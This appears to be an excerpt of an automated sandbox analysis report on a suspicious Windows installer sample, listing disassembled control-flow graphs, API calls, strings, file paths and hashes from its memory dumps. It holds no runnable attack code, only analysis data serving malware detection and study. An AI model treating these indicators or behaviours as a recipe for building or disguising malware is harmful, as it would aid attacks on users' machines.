                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                        • String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes$C:\Users\user\Desktop$C:\Users\user\Desktop\5WP9WCM8qV.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                        • API String ID: 3586999533-1789769228
                                        • Opcode ID: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
                                        • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                        • Opcode Fuzzy Hash: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
                                        • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 135 4052f3-40530e 136 405314-4053db GetDlgItem * 3 call 40414e call 404a51 GetClientRect GetSystemMetrics SendMessageW * 2 135->136 137 40549d-4054a4 135->137 159 4053f9-4053fc 136->159 160 4053dd-4053f7 SendMessageW * 2 136->160 139 4054a6-4054c8 GetDlgItem CreateThread CloseHandle 137->139 140 4054ce-4054db 137->140 139->140 142 4054f9-405503 140->142 143 4054dd-4054e3 140->143 144 405505-40550b 142->144 145 405559-40555d 142->145 147 4054e5-4054f4 ShowWindow * 2 call 40414e 143->147 148 40551e-405527 call 404180 143->148 150 405533-405543 ShowWindow 144->150 151 40550d-405519 call 4040f2 144->151 145->148 154 40555f-405565 145->154 147->142 156 40552c-405530 148->156 157 405553-405554 call 4040f2 150->157 158 405545-40554e call 4051b4 150->158 151->148 154->148 161 405567-40557a SendMessageW 154->161 157->145 158->157 162 40540c-405423 call 404119 159->162 163 4053fe-40540a SendMessageW 159->163 160->159 164 405580-4055ab CreatePopupMenu call 406077 AppendMenuW 161->164 165 40567c-40567e 161->165 174 405425-405439 ShowWindow 162->174 175 405459-40547a GetDlgItem SendMessageW 162->175 163->162 172 4055c0-4055d5 TrackPopupMenu 164->172 173 4055ad-4055bd GetWindowRect 164->173 165->156 172->165 176 4055db-4055f2 172->176 173->172 177 405448 174->177 178 40543b-405446 ShowWindow 174->178 175->165 179 405480-405498 SendMessageW * 2 175->179 180 4055f7-405612 SendMessageW 176->180 181 40544e-405454 call 40414e 177->181 178->181 179->165 180->180 182 405614-405637 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->182 181->175 184 405639-405660 SendMessageW 182->184 184->184 185 405662-405676 GlobalUnlock SetClipboardData CloseClipboard 184->185 185->165
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 00405351
                                        • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                        • GetClientRect.USER32(?,?), ref: 0040539D
                                        • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                        • ShowWindow.USER32(?,00000008), ref: 00405440
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                          • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                        • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                        • CloseHandle.KERNELBASE(00000000), ref: 004054C8
                                        • ShowWindow.USER32(00000000), ref: 004054EC
                                        • ShowWindow.USER32(?,00000008), ref: 004054F1
                                        • ShowWindow.USER32(00000008), ref: 0040553B
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                        • CreatePopupMenu.USER32 ref: 00405580
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                        • GetWindowRect.USER32(?,?), ref: 004055B4
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                        • OpenClipboard.USER32(00000000), ref: 00405615
                                        • EmptyClipboard.USER32 ref: 0040561B
                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                        • GlobalLock.KERNEL32(00000000), ref: 00405631
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                        • CloseClipboard.USER32 ref: 00405676
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: {
                                        • API String ID: 590372296-366298937
                                        • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                        • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                        • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                        • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 429 406077-406082 430 406084-406093 429->430 431 406095-4060ab 429->431 430->431 432 4060b1-4060be 431->432 433 4062c3-4062c9 431->433 432->433 436 4060c4-4060cb 432->436 434 4060d0-4060dd 433->434 435 4062cf-4062da 433->435 434->435 439 4060e3-4060ef 434->439 437 4062e5-4062e6 435->437 438 4062dc-4062e0 call 406055 435->438 436->433 438->437 441 4062b0 439->441 442 4060f5-406131 439->442 443 4062b2-4062bc 441->443 444 4062be-4062c1 441->444 445 406251-406255 442->445 446 406137-406142 GetVersion 442->446 443->433 444->433 447 406257-40625b 445->447 448 40628a-40628e 445->448 449 406144-406148 446->449 450 40615c 446->450 451 40626b-406278 call 406055 447->451 452 40625d-406269 call 405f9c 447->452 454 406290-406298 call 406077 448->454 455 40629d-4062ae lstrlenW 448->455 449->450 456 40614a-40614e 449->456 453 406163-40616a 450->453 467 40627d-406286 451->467 452->467 459 40616c-40616e 453->459 460 40616f-406171 453->460 454->455 455->433 456->450 457 406150-406154 456->457 457->450 463 406156-40615a 457->463 459->460 465 406173-406190 call 405f22 460->465 466 4061ad-4061b0 460->466 463->453 472 406195-406199 465->472 470 4061c0-4061c3 466->470 471 4061b2-4061be GetSystemDirectoryW 466->471 467->455 469 406288 467->469 473 406249-40624f call 4062e9 469->473 475 4061c5-4061d3 GetWindowsDirectoryW 470->475 476 40622e-406230 470->476 474 406232-406236 471->474 477 406238-40623c 472->477 478 40619f-4061a8 call 406077 472->478 473->455 474->473 474->477 475->476 476->474 479 4061d5-4061df 476->479 477->473 484 40623e-406244 lstrcatW 477->484 478->474 481 4061e1-4061e4 479->481 482 4061f9-40620f SHGetSpecialFolderLocation 479->482 481->482 486 4061e6-4061ed 481->486 487 406211-406228 SHGetPathFromIDListW CoTaskMemFree 482->487 488 40622a 482->488 484->473 490 4061f5-4061f7 486->490 487->474 487->488 488->476 490->474 490->482
                                        APIs
                                        • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,?,004051EB,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,00000000,0041D820), ref: 0040613A
                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                        • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                        • CoTaskMemFree.OLE32(?), ref: 00406220
                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,?,004051EB,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,00000000,0041D820), ref: 0040629E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 900638850-2587863890
                                        • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                        • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                        • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                        • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 491 405846-40586c call 405b11 494 405885-40588c 491->494 495 40586e-405880 DeleteFileW 491->495 497 40588e-405890 494->497 498 40589f-4058af call 406055 494->498 496 405a02-405a06 495->496 499 4059b0-4059b5 497->499 500 405896-405899 497->500 506 4058b1-4058bc lstrcatW 498->506 507 4058be-4058bf call 405a55 498->507 499->496 503 4059b7-4059ba 499->503 500->498 500->499 504 4059c4-4059cc call 406398 503->504 505 4059bc-4059c2 503->505 504->496 515 4059ce-4059e2 call 405a09 call 4057fe 504->515 505->496 509 4058c4-4058c8 506->509 507->509 511 4058d4-4058da lstrcatW 509->511 512 4058ca-4058d2 509->512 514 4058df-4058fb lstrlenW FindFirstFileW 511->514 512->511 512->514 516 405901-405909 514->516 517 4059a5-4059a9 514->517 531 4059e4-4059e7 515->531 532 4059fa-4059fd call 4051b4 515->532 519 405929-40593d call 406055 516->519 520 40590b-405913 516->520 517->499 522 4059ab 517->522 533 405954-40595f call 4057fe 519->533 534 40593f-405947 519->534 523 405915-40591d 520->523 524 405988-405998 FindNextFileW 520->524 522->499 523->519 527 40591f-405927 523->527 524->516 530 40599e-40599f FindClose 524->530 527->519 527->524 530->517 531->505 536 4059e9-4059f8 call 4051b4 call 405ef6 531->536 532->496 542 405980-405983 call 4051b4 533->542 543 405961-405964 533->543 534->524 537 405949-405952 call 405846 534->537 536->496 537->524 542->524 546 405966-405976 call 4051b4 call 405ef6 543->546 547 405978-40597e 543->547 546->524 547->524
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 0040586F
                                        • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004058B7
                                        • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004058DA
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004058E0
                                        • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004058F0
                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                        • FindClose.KERNEL32(00000000), ref: 0040599F
                                        Strings
                                        • "C:\Users\user\Desktop\5WP9WCM8qV.exe", xrefs: 0040584F
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                        • \*.*, xrefs: 004058B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-2522847261
                                        • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                        • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                        • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                        • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                        APIs
                                        • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                        Strings
                                        • C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes, xrefs: 00402154
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes
                                        • API String ID: 542301482-2994632085
                                        • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                        • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                        • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                        • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                        • FindClose.KERNEL32(00000000), ref: 004063AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                        • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                        • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                        • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 186 403c41-403c53 187 403d94-403da3 186->187 188 403c59-403c5f 186->188 190 403df2-403e07 187->190 191 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 187->191 188->187 189 403c65-403c6e 188->189 194 403c70-403c7d SetWindowPos 189->194 195 403c83-403c86 189->195 192 403e47-403e4c call 404165 190->192 193 403e09-403e0c 190->193 191->190 205 403e51-403e6c 192->205 197 403e0e-403e19 call 401389 193->197 198 403e3f-403e41 193->198 194->195 200 403ca0-403ca6 195->200 201 403c88-403c9a ShowWindow 195->201 197->198 219 403e1b-403e3a SendMessageW 197->219 198->192 204 4040e6 198->204 206 403cc2-403cc5 200->206 207 403ca8-403cbd DestroyWindow 200->207 201->200 212 4040e8-4040ef 204->212 210 403e75-403e7b 205->210 211 403e6e-403e70 call 40140b 205->211 215 403cc7-403cd3 SetWindowLongW 206->215 216 403cd8-403cde 206->216 213 4040c3-4040c9 207->213 222 403e81-403e8c 210->222 223 4040a4-4040bd DestroyWindow EndDialog 210->223 211->210 213->204 220 4040cb-4040d1 213->220 215->212 217 403d81-403d8f call 404180 216->217 218 403ce4-403cf5 GetDlgItem 216->218 217->212 224 403d14-403d17 218->224 225 403cf7-403d0e SendMessageW IsWindowEnabled 218->225 219->212 220->204 227 4040d3-4040dc ShowWindow 220->227 222->223 228 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 222->228 223->213 229 403d19-403d1a 224->229 230 403d1c-403d1f 224->230 225->204 225->224 227->204 256 403ee1-403ee6 228->256 257 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 228->257 233 403d4a-403d4f call 4040f2 229->233 234 403d21-403d27 230->234 235 403d2d-403d32 230->235 233->217 238 403d68-403d7b SendMessageW 234->238 239 403d29-403d2b 234->239 235->238 240 403d34-403d3a 235->240 238->217 239->233 244 403d51-403d5a call 40140b 240->244 245 403d3c-403d42 call 40140b 240->245 244->217 253 403d5c-403d66 244->253 254 403d48 245->254 253->254 254->233 256->257 260 403f27-403f28 257->260 261 403f2a 257->261 262 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 260->262 261->262 263 403f5c-403f6d SendMessageW 262->263 264 403f6f 262->264 265 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 263->265 264->265 265->205 274 403fb9-403fbb 265->274 274->205 275 403fc1-403fc5 274->275 276 403fe4-403ff8 DestroyWindow 275->276 277 403fc7-403fcd 275->277 276->213 279 403ffe-40402b CreateDialogParamW 276->279 277->204 278 403fd3-403fd9 277->278 278->205 280 403fdf 278->280 279->213 281 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->204 281->204 286 40408a-40409d ShowWindow call 404165 281->286 288 4040a2 286->288 288->213
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                        • ShowWindow.USER32(?), ref: 00403C9A
                                        • DestroyWindow.USER32 ref: 00403CAE
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                        • GetDlgItem.USER32(?,?), ref: 00403CEB
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                        • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                        • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                        • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                        • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                        • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                        • EnableWindow.USER32(?,?), ref: 00403F1D
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                        • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                        • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                        • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                        • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 3282139019-0
                                        • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                        • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                        • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                        • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
